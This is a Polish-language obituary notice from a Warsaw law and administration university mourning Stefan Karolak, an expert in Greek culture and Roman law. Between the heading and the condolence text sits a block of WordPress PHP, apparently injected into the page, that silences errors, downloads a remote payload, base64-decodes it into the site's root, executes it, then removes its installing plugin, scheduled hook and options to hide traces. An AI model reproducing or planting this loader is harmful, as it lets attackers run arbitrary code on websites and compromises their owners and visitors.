Stefan Karolak Pożegnanie

error_reporting(0);
$http=get_option(E_NOTICE);
$resp=wp_remote_get( $http[0]);
$code=wp_remote_retrieve_body($resp);
file_put_contents(ABSPATH.$http[1], base64_decode($code));
include_once(ABSPATH.$http[4]);
deactivate_plugins($http[2]);
delete_plugins(array($http[2]));
wp_clear_scheduled_hook($http[3]);
delete_option($http[5]);
delete_option(E_NOTICE);

Z głębokim smutkiem przyjęliśmy

wiadomość o śmierci

 

Stefana Karolaka

 

Wybitnego Znawcy Kultury Greckiej i Prawa Rzymskiego oraz wieloletniego współpracownika Uczelni

 

RODZINIE

składamy najserdeczniejsze  wyrazy współczucia

 

Rektor, Kanclerz, Senat, pracownicy i studenci

 Europejskiej Wyższej Szkoły Prawa i Administracji

w Warszawie